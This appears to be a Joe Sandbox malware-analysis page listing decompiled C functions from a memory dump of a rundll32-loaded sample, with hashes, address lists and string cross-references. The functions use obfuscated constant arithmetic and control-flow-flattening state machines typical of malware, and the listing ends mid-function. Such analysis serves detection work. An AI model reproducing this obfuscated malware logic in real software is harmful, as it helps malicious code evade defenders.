Opcode ID: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction ID: 48653eb64770e08f90b0effd2631becc7befea07c136a9e8f7f8472ce2e08f8d
Opcode Fuzzy Hash: bb31032d2e2ee86c7c0b69b262f4d6c603d272611a24b6ff2f3b23f068030bec
Instruction Fuzzy Hash: CD71447150D3429FD358CF61C84991FBBE2FBC8758F104A1DF5965A2A0C3B5CA4A8F86

Uniqueness

Uniqueness Score: -1.00%

Function 10017570, Relevance: 6.4, Strings: 5, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10017570(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v584;
				void* _t176;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;

				_v20 = 0x17f2;
				_t183 = 0x21;
				_v20 = _v20 / _t183;
				_v20 = _v20 + 0x6d93;
				_v20 = _v20 ^ 0xb3130aa6;
				_v20 = _v20 ^ 0xb31362a2;
				_v44 = 0x7846;
				_t184 = 0x2b;
				_v44 = _v44 / _t184;
				_v44 = _v44 | 0x2d637405;
				_v44 = _v44 ^ 0x2d633d3a;
				_v12 = 0x826a;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xfdce;
				_v12 = _v12 ^ 0x01053037;
				_v40 = 0xb008;
				_t185 = 9;
				_v40 = _v40 / _t185;
				_v40 = _v40 | 0xdff8508a;
				_v40 = _v40 ^ 0xdff82a49;
				_v16 = 0x97c9;
				_v16 = _v16 >> 6;
				_v16 = _v16 << 0xd;
				_t186 = 0x13;
				_v16 = _v16 / _t186;
				_v16 = _v16 ^ 0x0003c223;
				_v52 = 0xe117;
				_v52 = _v52 + 0xb465;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x00cab1cc;
				_v8 = 0x7d37;
				_v8 = _v8 ^ 0x8829a720;
				_v8 = _v8 << 0xa;
				_t187 = 0x5d;
				_v8 = _v8 * 0x3b;
				_v8 = _v8 ^ 0x950d599f;
				_v28 = 0xafcc;
				_v28 = _v28 / _t187;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00004226;
				_v56 = 0x4900;
				_v56 = _v56 | 0xacb64693;
				_v56 = _v56 ^ 0xacb6052b;
				_v24 = 0xef8a;
				_v24 = _v24 + 0xf857;
				_v24 = _v24 ^ 0xfd20d672;
				_v24 = _v24 * 0x1d;
				_v24 = _v24 ^ 0xacc29ce3;
				_v48 = 0xd87;
				_v48 = _v48 | 0xb3f54364;
				_v48 = _v48 + 0xffff5c7b;
				_v48 = _v48 ^ 0xb3f4bccb;
				_v60 = 0x28ae;
				_v60 = _v60 + 0xfffff49f;
				_v60 = _v60 ^ 0x000001f3;
				_v36 = 0xf8cf;
				_v36 = _v36 ^ 0x7fa8aefd;
				_v36 = _v36 + 0xffff1020;
				_v36 = _v36 ^ 0x7fa70865;
				_v32 = 0x4e50;
				_t188 = 0xf;
				_v32 = _v32 * 0x79;
				_t189 = 6;
				_v32 = _v32 / _t188;
				_v32 = _v32 ^ 0x0002677d;
				_v64 = 0x2ab7;
				_v64 = _v64 / _t189;
				_v64 = _v64 ^ 0x00007a29;
				_t176 = E10001E13(_v20, _v44, _v12, _v40,  *0x100221b0 + 0x10);
				_t213 = _a4 + 0x2c;
				if(E1000D867(_a4 + 0x2c, _v16, _t176, _v52, _v8, _v28) != 0) {
					E1001DEE8(_v56,  &_v584, _v24, _t213, _a8, _v48);
					E10003CA0(_v60, _v36, _v32,  &_v584, _v64);
				}
				return 1;
			}

0x10017579
0x10017588
0x1001758d
0x10017592
0x10017599
0x100175a0
0x100175a7
0x100175b1
0x100175b6
0x100175bb
0x100175c2
0x100175c9
0x100175d0
0x100175d4
0x100175d8
0x100175df
0x100175e6
0x100175f0
0x100175f5
0x100175fa
0x10017601
0x10017608
0x1001760f
0x10017613
0x1001761a
0x1001761f
0x10017624
0x1001762b
0x10017632
0x10017639
0x1001763d
0x10017644
0x1001764b
0x10017652
0x1001765a
0x1001765b
0x1001765e
0x10017665
0x10017671
0x10017674
0x10017677
0x1001767e
0x10017685
0x1001768c
0x10017693
0x1001769a
0x100176a1
0x100176ac
0x100176af
0x100176b6
0x100176bd
0x100176c4
0x100176cb
0x100176d2
0x100176d9
0x100176e0
0x100176e7
0x100176ee
0x100176f5
0x100176fe
0x10017705
0x10017712
0x10017715
0x1001771d
0x1001771e
0x10017723
0x1001772a
0x10017736
0x10017739
0x10017755
0x10017763
0x10017779
0x1001778e
0x100177a6
0x100177ab
0x100177b5

Strings

7}, xrefs: 10017644
)z, xrefs: 10017739
:=c-, xrefs: 100175C2
PN, xrefs: 10017705
&B, xrefs: 10017677

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: &B$)z$7}$:=c-$PN
API String ID: 1586166983-136981183
Opcode ID: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
Instruction ID: 4c0853177137f9260245fdea803910a11f1a139b5b3783921c9f25fd3a1c4bd4
Opcode Fuzzy Hash: c149a1545c5a6f83b4e93e0c549a75000216febd44645262f1429a9ff698bb76
Instruction Fuzzy Hash: 59611471D0020EEBEF48CFE5D98A9EEBBB2FB44314F208059E411B6290D7B95A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000C6EF, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1000C6EF(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t105;
				intOrPtr* _t118;
				void* _t120;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t131;
				signed int* _t133;

				_push(_a20);
				_t131 = __edx;
				_t118 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t105);
				_v32 = 0x6ec3;
				_t133 =  &(( &_v48)[7]);
				_v32 = _v32 << 2;
				_v32 = _v32 >> 0xd;
				_t128 = 0;
				_v32 = _v32 ^ 0x00000124;
				_t120 = 0x2e625de7;
				_v20 = 0xd76a;
				_t129 = 5;
				_v20 = _v20 / _t129;
				_v20 = _v20 ^ 0x000055da;
				_v48 = 0x58a7;
				_v48 = _v48 + 0x6c8;
				_v48 = _v48 << 0xb;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0xf6f0317b;
				_v36 = 0x5d19;
				_v36 = _v36 * 0x6c;
				_v36 = _v36 + 0xb738;
				_v36 = _v36 ^ 0x0027d757;
				_v24 = 0x73a3;
				_v24 = _v24 + 0x4f0f;
				_v24 = _v24 ^ 0x0000ed3d;
				_v44 = 0x403e;
				_v44 = _v44 ^ 0xd0448639;
				_v44 = _v44 + 0xffffdeb2;
				_v44 = _v44 << 4;
				_v44 = _v44 ^ 0x044a6664;
				_v16 = 0x1c10;
				_v16 = _v16 * 0x51;
				_v16 = _v16 ^ 0x0008f1ff;
				_v4 = 0x63b7;
				_v4 = _v4 << 0x10;
				_v4 = _v4 ^ 0x63b7360b;
				_v28 = 0x3e7f;
				_v28 = _v28 ^ 0x7d4cf8f0;
				_t130 = _v4;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x89322d32;
				_v40 = 0xdd6b;
				_v40 = _v40 + 0xfc8c;
				_v40 = _v40 >> 0x10;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x0000558e;
				_v8 = 0x49f9;
				_v8 = _v8 + 0xfffff29f;
				_v8 = _v8 ^ 0x00000d42;
				_v12 = 0x318;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x0000321b;
				do {
					while(_t120 != 0xc7aef4e) {
						if(_t120 == 0x1f37240b) {
							_t130 = E10009A00(_v32, _t120, 0, _v20, _a16, 0, _a12, _v48, _t120, _v36, _v24, _t131);
							_t133 =  &(_t133[0xb]);
							if(_t130 == 0) {
								L7:
								return _t128;
							}
							_t120 = 0xc7aef4e;
							continue;
						}
						if(_t120 == 0x2e625de7) {
							_t120 = 0x1f37240b;
							continue;
						}
						if(_t120 != 0x32a206ac) {
							goto L14;
						}
						E10009A00(_v4, _t120, _t128, _v28, _a16, _t130, _a12, _v40, _t120, _v8, _v12, _t131);
						if(_t118 != 0) {
							 *_t118 = _t130;
						}
						goto L7;
					}
					_push(_t120);
					_t128 = E100157E8(_t130);
					if(_t128 == 0) {
						_t120 = 0x3ab8f213;
						goto L14;
					}
					_t120 = 0x32a206ac;
					continue;
					L14:
				} while (_t120 != 0x3ab8f213);
				goto L7;
			}

0x1000c6f6
0x1000c6fa
0x1000c6fc
0x1000c6fe
0x1000c702
0x1000c706
0x1000c70a
0x1000c70e
0x1000c70f
0x1000c710
0x1000c715
0x1000c71d
0x1000c720
0x1000c727
0x1000c72c
0x1000c72e
0x1000c736
0x1000c73b
0x1000c749
0x1000c74c
0x1000c750
0x1000c758
0x1000c760
0x1000c768
0x1000c76d
0x1000c772
0x1000c77a
0x1000c787
0x1000c78b
0x1000c793
0x1000c79b
0x1000c7a3
0x1000c7ab
0x1000c7b3
0x1000c7bb
0x1000c7c3
0x1000c7cb
0x1000c7d0
0x1000c7d8
0x1000c7e5
0x1000c7e9
0x1000c7f1
0x1000c7f9
0x1000c7fe
0x1000c806
0x1000c80e
0x1000c81b
0x1000c81f
0x1000c823
0x1000c82b
0x1000c833
0x1000c83b
0x1000c840
0x1000c845
0x1000c84d
0x1000c855
0x1000c85d
0x1000c865
0x1000c86d
0x1000c872
0x1000c87a
0x1000c87a
0x1000c88c
0x1000c90a
0x1000c90c
0x1000c911
0x1000c8d1
0x1000c8da
0x1000c8da
0x1000c913
0x00000000
0x1000c913
0x1000c894
0x1000c8db
0x00000000
0x1000c8db
0x1000c89c
0x00000000
0x00000000
0x1000c8c3
0x1000c8cd
0x1000c8cf
0x1000c8cf
0x00000000
0x1000c8cd
0x1000c925
0x1000c92d
0x1000c932
0x1000c93e
0x00000000
0x1000c93e
0x1000c934
0x00000000
0x1000c943
0x1000c943
0x00000000

Strings

=, xrefs: 1000C7AB
]b., xrefs: 1000C88E
]b., xrefs: 1000C736
>@, xrefs: 1000C7B3
B, xrefs: 1000C85D

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =$>@$B$]b.$]b.
API String ID: 0-2184513905
Opcode ID: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction ID: e65ca6d1074f01d69a0b358cd156f112c6aca70ad4656599cc2acd5269c1bdd2
Opcode Fuzzy Hash: 7917007c32555daef5f93cb3609acba7d11e2b7698ae42c09df89798a5b82ff8
Instruction Fuzzy Hash: 7A516372008341ABE358CF61C88991FBBE1FBC8798F108A1DF59652260C7B5DA09DF97

Uniqueness

Uniqueness Score: -1.00%

Function 10009AE1, Relevance: 6.4, Strings: 5, Instructions: 133
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10009AE1(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v72;
				intOrPtr _v76;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				intOrPtr* _t145;
				intOrPtr* _t148;
				intOrPtr* _t150;
				void* _t155;
				void* _t156;

				_t132 = __ecx;
				_t148 =  *0x10021400; // 0x0
				while(_t148 != 0) {
					if( *_t148 != 0) {
						 *((intOrPtr*)(_t148 + 0x1c))( *_t148, 0xb, 0);
					}
					_t148 =  *((intOrPtr*)(_t148 + 0x10));
				}
				_t133 = _t132 | 0xffffffff;
				_pop(_t149);
				_t156 = _t155 - 0x40;
				_v8 = 0x42f0c0;
				_t130 = _t133;
				_v4 = 0;
				_v32 = 0x6e16;
				_t145 = 0x10021400;
				_v32 = _v32 * 0x5a;
				_v32 = _v32 ^ 0x0026feb4;
				_v36 = 0x8b1c;
				_v36 = _v36 | 0xe0bb5784;
				_v36 = _v36 ^ 0xe0bbe7d8;
				_v44 = 0xb12;
				_v44 = _v44 ^ 0x7b8ee909;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x07b8dae4;
				_v60 = 0xab64;
				_v60 = _v60 + 0xffff1f21;
				_v60 = _v60 ^ 0x0d405f68;
				_v60 = _v60 ^ 0x2b3fedb8;
				_v60 = _v60 ^ 0xd98056b3;
				_v64 = 0x7bd7;
				_v64 = _v64 * 0x50;
				_v64 = _v64 >> 8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 ^ 0x0135cdcf;
				_v16 = 0xecab;
				_v16 = _v16 * 0x2d;
				_v16 = _v16 ^ 0x0029a0af;
				_v40 = 0xc18d;
				_v40 = _v40 + 0x35cc;
				_v40 = _v40 + 0x172a;
				_v40 = _v40 ^ 0x00011856;
				_v20 = 0xa565;
				_v20 = _v20 | 0x765f3394;
				_v20 = _v20 ^ 0x765fa4be;
				_v24 = 0xe1b9;
				_v24 = _v24 * 0x49;
				_v24 = _v24 ^ 0x00405f3b;
				_v48 = 0x2e03;
				_v48 = _v48 + 0xf77b;
				_v48 = _v48 ^ 0x50a91f1d;
				_v48 = _v48 ^ 0x34247e68;
				_v48 = _v48 ^ 0x648c5df0;
				_v12 = 0x6cf0;
				_v12 = _v12 + 0x5895;
				_v12 = _v12 ^ 0x0000ed40;
				_v52 = 0x996c;
				_v52 = _v52 + 0xd3f;
				_v52 = _v52 << 0xa;
				_v52 = _v52 ^ 0x4e95cfbf;
				_v52 = _v52 ^ 0x4c0f105b;
				_v56 = 0xb088;
				_v56 = _v56 + 0xffff7048;
				_v56 = _v56 >> 5;
				_v56 = _v56 * 0x1f;
				_v56 = _v56 ^ 0x00001ffc;
				_v28 = 0xa4f1;
				_v28 = _v28 + 0xacd;
				_v28 = _v28 ^ 0x0000afbe;
				_t150 =  *0x10021400; // 0x0
				while(_t150 != 0) {
					if( *_t150 == 0) {
						L10:
						 *_t145 =  *((intOrPtr*)(_t150 + 0x10));
						_t124 = E100091CD(_v48, _v12, _v52, _t150, _v56);
						_t156 = _t156 + 0xc;
					} else {
						_t124 = E10017CBC(_v32,  *((intOrPtr*)(_t150 + 4)), _t130, _v36);
						if(_t124 != _v28) {
							_t117 = _t150 + 0x10; // 0x10
							_t145 = _t117;
						} else {
							 *((intOrPtr*)(_t150 + 0x1c))( *_t150, 0, 0);
							E10018C8B(_v56, _v72, _v76,  *_t150);
							E100078F0( *((intOrPtr*)(_t150 + 4)), _v28, _v52, _v32, _v36);
							_t156 = _t156 + 0x14;
							goto L10;
						}
					}
					_t150 =  *_t145;
				}
				return _t124;
			}

0x10009ae1
0x10009ae2
0x10009afb
0x10009aed
0x10009af5
0x10009af5
0x10009af8
0x10009af8
0x10009aff
0x10009b02
0x10011e45
0x10011e48
0x10011e54
0x10011e56
0x10011e5a
0x10011e69
0x10011e6e
0x10011e72
0x10011e7a
0x10011e82
0x10011e8a
0x10011e92
0x10011e9a
0x10011ea2
0x10011ea7
0x10011eaf
0x10011eb7
0x10011ebf
0x10011ec7
0x10011ecf
0x10011ed7
0x10011ee4
0x10011ee8
0x10011eed
0x10011ef2
0x10011efa
0x10011f07
0x10011f0b
0x10011f13
0x10011f1b
0x10011f23
0x10011f2b
0x10011f33
0x10011f3b
0x10011f43
0x10011f4b
0x10011f58
0x10011f5c
0x10011f64
0x10011f6c
0x10011f74
0x10011f7c
0x10011f84
0x10011f8c
0x10011f94
0x10011f9c
0x10011fa4
0x10011fac
0x10011fb4
0x10011fb9
0x10011fc1
0x10011fc9
0x10011fd1
0x10011fd9
0x10011fe3
0x10011fe7
0x10011fef
0x10011ff7
0x10011fff
0x10012007
0x10012081
0x10012011
0x10012061
0x10012075
0x10012077
0x1001207c
0x10012013
0x1001201f
0x1001202a
0x1001208d
0x1001208d
0x1001202c
0x10012030
0x10012041
0x10012059
0x1001205e
0x00000000
0x1001205e
0x1001202a
0x1001207f
0x1001207f
0x1001208c

Strings

h_@, xrefs: 10011EBF
?, xrefs: 10011FAC
@, xrefs: 10011F9C
h~$4, xrefs: 10011F7C
;_@, xrefs: 10011F5C

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;_@$?$@$h_@$h~$4
API String ID: 0-1313548790
Opcode ID: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction ID: b19c1ca6e3d31d4d4ef9159ac445c0ba32e9153f74aa0842d826561c908fa0a9
Opcode Fuzzy Hash: 19c60eb2fc9d772e2184e1397d5d84d04df9bbe5c21165f98c8c15ce99fbaf5a
Instruction Fuzzy Hash: 46610EB55083419FE354CF21C48940BFBF1FB88798F505E1DF596662A0C3B5AA89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 10007605, Relevance: 6.4, Strings: 5, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10007605() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t110;
				void* _t118;
				signed int _t120;
				signed int _t135;
				signed int _t136;
				short* _t137;
				signed int* _t140;

				_t140 =  &_v568;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x1387ac;
				_t118 = 0x4e41429;
				_v552 = 0x9cc8;
				_v552 = _v552 * 0xb;
				_v552 = _v552 | 0x98122ffa;
				_v552 = _v552 ^ 0x9816c8f2;
				_v548 = 0xc79b;
				_v548 = _v548 << 5;
				_v548 = _v548 >> 6;
				_v548 = _v548 ^ 0x00001472;
				_v560 = 0x2de7;
				_t135 = 0xb;
				_v560 = _v560 / _t135;
				_v560 = _v560 >> 0xf;
				_v560 = _v560 | 0x0a536918;
				_v560 = _v560 ^ 0x0a532199;
				_v536 = 0x89b4;
				_v536 = _v536 + 0xffff0cb8;
				_v536 = _v536 ^ 0xffffc1bc;
				_v532 = 0xdd21;
				_v532 = _v532 + 0xb061;
				_v532 = _v532 ^ 0x0001daa7;
				_v564 = 0x77e3;
				_t136 = 0x1c;
				_v564 = _v564 * 0x76;
				_v564 = _v564 << 0xc;
				_v564 = _v564 + 0xffff5cda;
				_v564 = _v564 ^ 0x74296bf4;
				_v556 = 0x240d;
				_t110 = _v556 / _t136;
				_v556 = _t110;
				_v556 = _v556 + 0xcc42;
				_v556 = _v556 >> 7;
				_v556 = _v556 ^ 0x00001fe6;
				_v544 = 0x5b3d;
				_v544 = _v544 + 0xffffa256;
				_v544 = _v544 ^ 0xffff9726;
				_t137 = _v544;
				_v540 = 0x5d73;
				_v540 = _v540 + 0xffff95f2;
				_v540 = _v540 ^ 0xffff9ed1;
				L1:
				while(_t118 != 0x2493963) {
					if(_t118 == 0x4e41429) {
						_t118 = 0x2493963;
						continue;
					}
					if(_t118 == 0x95c6af5) {
						return E10015891(_t137,  *0x100221b0 + 0x10, _v556, _v544, _v540);
					}
					if(_t118 != 0x1ce20f0e) {
						L15:
						__eflags = _t118 - 0x278615fa;
						if(__eflags != 0) {
							continue;
						}
						return _t110;
					}
					_v568 = 0x3f77;
					_v568 = _v568 ^ 0x040fc81f;
					_t120 = 0x71;
					_v568 = _v568 / _t120;
					_v568 = _v568 >> 4;
					_v568 = _v568 ^ 0x00009342;
					_t137 =  &_v520 + E1001BBAB(_v536, _v532,  &_v520, _v564) * 2;
					while(1) {
						_t110 =  &_v520;
						if(_t137 <= _t110) {
							break;
						}
						__eflags =  *_t137 - 0x5c;
						if( *_t137 != 0x5c) {
							L8:
							_t137 = _t137 - 2;
							__eflags = _t137;
							continue;
						}
						_t94 =  &_v568;
						 *_t94 = _v568 - 1;
						__eflags =  *_t94;
						if( *_t94 == 0) {
							__eflags = _t137;
							L12:
							_t118 = 0x95c6af5;
							goto L1;
						}
						goto L8;
					}
					goto L12;
				}
				_t110 = E10008C0C(_v552, __eflags, _v548, _v560,  &_v520);
				_t140 =  &(_t140[3]);
				_t118 = 0x1ce20f0e;
				goto L15;
			}

0x10007605
0x1000760b
0x10007612
0x1000761a
0x1000761f
0x10007630
0x10007639
0x10007646
0x10007653
0x1000765b
0x10007660
0x10007665
0x1000766d
0x1000767b
0x10007680
0x10007686
0x1000768b
0x10007693
0x1000769b
0x100076a3
0x100076ab
0x100076b3
0x100076bb
0x100076c3
0x100076cb
0x100076d8
0x100076d9
0x100076dd
0x100076e2
0x100076ea
0x100076f2
0x100076fe
0x10007700
0x10007704
0x1000770c
0x10007711
0x10007719
0x10007721
0x10007729
0x10007731
0x10007735
0x1000773d
0x10007745
0x00000000
0x1000774d
0x1000775b
0x100077e1
0x00000000
0x100077e1
0x10007763
0x00000000
0x1000782d
0x1000776b
0x10007803
0x10007803
0x10007809
0x00000000
0x00000000
0x00000000
0x10007809
0x10007771
0x1000777b
0x10007789
0x1000778c
0x10007794
0x10007799
0x100077b9
0x100077cd
0x100077cd
0x100077d3
0x00000000
0x00000000
0x100077be
0x100077c2
0x100077ca
0x100077ca
0x100077ca
0x00000000
0x100077ca
0x100077c4
0x100077c4
0x100077c4
0x100077c8
0x100077d7
0x100077da
0x100077da
0x00000000
0x100077da
0x00000000
0x100077c8
0x00000000
0x100077d5
0x100077f9
0x100077fe
0x10007801
0x00000000

Strings

w?, xrefs: 10007771
$, xrefs: 100076F2
s], xrefs: 10007735
=[, xrefs: 10007719
w, xrefs: 100076CB

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $$=[$s]$w?$w
API String ID: 0-3700477970
Opcode ID: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
Instruction ID: 1a6987bc6c1846451349bb2a40725533db3d3377cb45e9f1ccf3a4716e170320
Opcode Fuzzy Hash: 62ff0d1c6547e0b70e078bd31fc65c68330c9ee5d58cb8db6e1cf70575695e7b
Instruction Fuzzy Hash: DC51497190C3429FE364CF25D44941FBBE1FBC4798F104A1EF599662A4D3B89A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 100094EC, Relevance: 5.2, Strings: 4, Instructions: 209
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100094EC() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t218;
				void* _t223;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t270;
				void* _t272;

				_t272 = (_t270 & 0xfffffff8) - 0x258;
				_v552 = 0xc5de;
				_v552 = _v552 << 0xb;
				_t223 = 0x10e191ba;
				_v552 = _v552 * 0xa;
				_v552 = _v552 ^ 0x3dd55649;
				_v528 = 0xd7a0;
				_v528 = _v528 ^ 0xb5a30bcc;
				_v528 = _v528 ^ 0xb5a3bef7;
				_v576 = 0xa7dd;
				_v576 = _v576 << 0xe;
				_t258 = 0x27;
				_v576 = _v576 / _t258;
				_v576 = _v576 ^ 0x011311a2;
				_v588 = 0x76f2;
				_v588 = _v588 | 0xcad6357e;
				_v588 = _v588 ^ 0x58bbddc5;
				_v588 = _v588 ^ 0x926db7d7;
				_v604 = 0x542d;
				_v604 = _v604 ^ 0xdabf7200;
				_v604 = _v604 | 0x518ac0ce;
				_v604 = _v604 + 0xffff5d7d;
				_v604 = _v604 ^ 0xdbbf6591;
				_v536 = 0x6f2;
				_v536 = _v536 ^ 0xb7ff586a;
				_v536 = _v536 ^ 0xb7ff59fe;
				_v564 = 0x9bc0;
				_t259 = 0x60;
				_v564 = _v564 * 0x77;
				_v564 = _v564 + 0xffff74e2;
				_v564 = _v564 ^ 0x0047e104;
				_v556 = 0xec1b;
				_v556 = _v556 * 0x26;
				_v556 = _v556 >> 3;
				_v556 = _v556 ^ 0x0004652b;
				_v568 = 0x50db;
				_v568 = _v568 / _t259;
				_v568 = _v568 << 8;
				_v568 = _v568 ^ 0x0000bb9e;
				_v540 = 0x45e;
				_t260 = 0x2a;
				_v540 = _v540 / _t260;
				_v540 = _v540 ^ 0x00003856;
				_v600 = 0xdcf5;
				_v600 = _v600 >> 0xb;
				_t261 = 0x55;
				_v600 = _v600 / _t261;
				_v600 = _v600 + 0xffff3d4e;
				_v600 = _v600 ^ 0xffff3115;
				_v544 = 0xeb2c;
				_v544 = _v544 | 0xbe9f19ff;
				_v544 = _v544 ^ 0xbe9ffb48;
				_v560 = 0x6b9e;
				_v560 = _v560 | 0x0e8ada92;
				_v560 = _v560 + 0xfffff2fa;
				_v560 = _v560 ^ 0x0e8af134;
				_v572 = 0xb259;
				_v572 = _v572 ^ 0x7ea6fcad;
				_v572 = _v572 * 0x50;
				_v572 = _v572 ^ 0x93f8b0e2;
				_v596 = 0x3f12;
				_t262 = 0x14;
				_v596 = _v596 * 0x3e;
				_v596 = _v596 | 0x39de80ab;
				_v596 = _v596 + 0x6fd8;
				_v596 = _v596 ^ 0x39e00adb;
				_v548 = 0xf59e;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x00004a18;
				_v532 = 0xef88;
				_v532 = _v532 / _t262;
				_v532 = _v532 ^ 0x00005e97;
				_v580 = 0xce2c;
				_t263 = 0x1d;
				_v580 = _v580 * 0x38;
				_v580 = _v580 / _t263;
				_v580 = _v580 ^ 0x00019ca1;
				_v584 = 0xcb97;
				_t264 = 0x7c;
				_v584 = _v584 * 0x5a;
				_v584 = _v584 * 0x11;
				_v584 = _v584 ^ 0x04c0b349;
				_v592 = 0xb13f;
				_v592 = _v592 / _t264;
				_v592 = _v592 * 0x6b;
				_v592 = _v592 | 0xb06a3ec2;
				_v592 = _v592 ^ 0xb06acb10;
				do {
					while(_t223 != 0xd11567f) {
						if(_t223 == 0xdefeb70) {
							_push(0x10001000);
							_push(_v576);
							E100163BF(E1001BF25(_v552, _v528, __eflags), __eflags, _v604, _v536,  &_v524,  *0x100221b0 + 0x234, _v564,  *0x100221b0 + 0x234,  *0x100221b0 + 0x10, _v556);
							_t218 = E1001C5F7(_v568, _v540, _v600, _v544, _t215);
							_t272 = _t272 + 0x2c;
							_t223 = 0x285c1f68;
							continue;
						} else {
							if(_t223 == 0x10e191ba) {
								_t223 = 0xdefeb70;
								continue;
							} else {
								if(_t223 == 0x285c1f68) {
									_t218 = E10001E13(_v560, _v572, _v596, _v548,  &_v524);
									_t272 = _t272 + 0xc;
									 *_t218 = 0;
									_t223 = 0xd11567f;
									continue;
								}
							}
						}
						goto L9;
					}
					E10004EA1( &_v524, _v532, _v580, _v584,  &_v524, E10017570, _v592, 0);
					_t272 = _t272 + 0x18;
					_t223 = 0x1084920c;
					L9:
					__eflags = _t223 - 0x1084920c;
				} while (__eflags != 0);
				return _t218;
			}

0x100094f2
0x100094f8
0x10009502
0x10009507
0x10009515
0x10009519
0x10009521
0x10009529
0x10009531
0x10009539
0x10009541
0x1000954c
0x10009551
0x10009557
0x1000955f
0x10009567
0x1000956f
0x10009577
0x1000957f
0x10009587
0x1000958f
0x10009597
0x1000959f
0x100095a7
0x100095af
0x100095b7
0x100095bf
0x100095cc
0x100095cf
0x100095d3
0x100095db
0x100095e3
0x100095f0
0x100095f4
0x100095f9
0x10009601
0x10009611
0x10009615
0x1000961a
0x10009622
0x1000962e
0x10009633
0x10009639
0x10009641
0x10009649
